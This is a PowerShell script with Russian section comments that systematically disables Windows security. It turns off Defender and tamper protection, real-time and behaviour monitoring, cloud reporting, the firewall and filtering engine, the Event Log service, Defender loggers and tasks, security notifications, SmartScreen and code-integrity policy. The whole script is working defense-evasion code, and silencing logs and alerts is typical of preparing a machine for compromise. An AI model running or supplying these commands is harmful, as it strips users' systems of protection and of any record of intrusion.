# 1. Отключение TamperProtection
Write-Host "#1" -f Yellow
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f

# 2. Отключение контролируемого доступа к папкам
Write-Host "#2" -f Yellow
Set-MpPreference -EnableControlledFolderAccess Disabled

# 3. Политики отключения Windows Defender и его компонентов
Write-Host "#3" -f Yellow
("AllowFastServiceStartup","ServiceKeepAlive") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "$_" /t REG_DWORD /d 0 /f}
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d 0 /f
("DisableAntiSpyware","DisableAntiVirus","DisableSpecialRunningModes") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "$_" /t REG_DWORD /d 1 /f}
("DisableBehaviorMonitoring","DisableIOAVProtection","DisableOnAccessProtection","DisableRealtimeMonitoring","DisableRoutinelyTakingAction","DisableScanOnRealtimeEnable") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "$_" /t REG_DWORD /d 1 /f}
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

# 4. Отключение служб SgrmBroker и SecurityHealthService
Write-Host "#4" -f Yellow
("SgrmBroker","SecurityHealthService") |% {reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f}

# 5. Отключение WMI Autologger для Defender
Write-Host "#5" -f Yellow
("DefenderApiLogger","DefenderAuditLogger") |% {reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\$_" /v "Start" /t REG_DWORD /d 0 /f}

# 6. Отключение задач планировщика Windows Defender
Write-Host "#6" -f Yellow
schtasks /Change /tn "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /disable
("Windows Defender Cache Maintenance","Windows Defender Cleanup","Windows Defender Scheduled Scan","Windows Defender Verification") |% {schtasks /change /tn "Microsoft\Windows\Windows Defender\$_" /disable}

# 7. Отключение основных служб защиты
Write-Host "#7" -f Yellow
("Sense","webthreatdefsvc","webthreatdefusersvc","WdNisSvc","WdNisDrv","MDCoreSvc","SgrmBroker","SecurityHealthService","wscsvc","WinDefend","WdFilter","WdBoot","MpsSvc","mpssvc","BFE","Wecsvc","EventLog") |% {spsv $_ -force -ea 0; Set-Service $_ -st Disabled -ea 0; reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f; reg add "HKLM\System\CurrentControlSet\Services\$_" /v "AutorunsDisabled" /t REG_DWORD /d 3 /f}

# 8. Удаление автозагрузок SecurityHealth
Write-Host "#8" -f Yellow
("Explorer\StartupApproved\Run","Run") |% {reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\$_" /v "SecurityHealth" /f}

# 9. Удаление контекстных меню EPP
Write-Host "#9" -f Yellow
("*","Directory","Drive") |% {reg delete "HKCR\$_\shellex\ContextMenuHandlers\EPP" /f}

# 10. Отключение всех уведомлений Windows Defender и системы
Write-Host "#10" -f Yellow
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SmartAppControl" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d 0 /f
("EnableNotifications","EnableToastApplicationNotification","NOC_GLOBAL_SETTING_TOASTS_ENABLED") |% {reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "$_" /t REG_DWORD /d 0 /f}
("DisableNotifications","DisableEnhancedNotifications","DisableMonitoring","DisableAlerts","DisableNotificationsUI","DisableNotificationCenter") |% {reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "$_" /t REG_DWORD /d 1 /f}

# 11. Отключение SmartScreen и связанных функций
Write-Host "#11" -f Yellow
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d Off /f
("SmartScreenEnabled","SmartScreenPuaEnabled") |% {reg add "HKCU\Software\Microsoft\Edge\$_" /ve /t REG_DWORD /d 0 /f}
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d 0 /f
("SvcEnabled","ServiceStart","ServiceState") |% {reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI" /v "$_" /t REG_DWORD /d 0 /f}